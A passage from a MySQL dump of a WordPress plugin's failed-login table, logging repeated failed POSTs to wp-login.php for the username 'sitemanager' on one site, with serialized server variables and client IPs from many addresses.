00:00:00'),(94190,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36312\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745528137.6155331;s:12:\"REQUEST_TIME\";i:1745528137;}}','23.239.27.53',0,'2025-04-25 02:25:39','1970-01-01 00:00:00'),(94191,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33178\";s:11:\"REMOTE_ADDR\";s:14:\"139.162.135.49\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745529253.8640189;s:12:\"REQUEST_TIME\";i:1745529253;}}','139.162.135.49',0,'2025-04-25 02:44:15','1970-01-01 00:00:00'),(94192,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36360\";s:11:\"REMOTE_ADDR\";s:14:\"103.173.227.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745529627.810606;s:12:\"REQUEST_TIME\";i:1745529627;}}','103.173.227.63',0,'2025-04-25 02:50:29','1970-01-01 00:00:00'),(94193,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34060\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745529999.278075;s:12:\"REQUEST_TIME\";i:1745529999;}}','164.160.91.19',0,'2025-04-25 02:56:41','1970-01-01 00:00:00'),(94194,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"18410\";s:11:\"REMOTE_ADDR\";s:13:\"108.181.92.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745530372.9698;s:12:\"REQUEST_TIME\";i:1745530372;}}','108.181.92.67',0,'2025-04-25 03:02:54','1970-01-01 00:00:00'),(94195,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53186\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745530744.7499471;s:12:\"REQUEST_TIME\";i:1745530744;}}','198.54.126.98',0,'2025-04-25 03:09:06','1970-01-01 00:00:00'),(94196,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55294\";s:11:\"REMOTE_ADDR\";s:13:\"63.250.38.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745531118.5857561;s:12:\"REQUEST_TIME\";i:1745531118;}}','63.250.38.151',0,'2025-04-25 03:15:20','1970-01-01 00:00:00');
INSERT INTO `wp_arm_fail_attempts` VALUES (94197,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34636\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.126.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745531861.18507;s:12:\"REQUEST_TIME\";i:1745531861;}}','198.54.126.2',0,'2025-04-25 03:27:43','1970-01-01 00:00:00'),(94198,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60714\";s:11:\"REMOTE_ADDR\";s:14:\"107.172.243.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745532417.495877;s:12:\"REQUEST_TIME\";i:1745532417;}}','107.172.243.11',0,'2025-04-25 03:36:59','1970-01-01 00:00:00'),(94199,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57112\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.237.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745532807.3413751;s:12:\"REQUEST_TIME\";i:1745532807;}}','188.166.237.78',0,'2025-04-25 03:43:29','1970-01-01 00:00:00'),(94200,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43636\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.73\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\"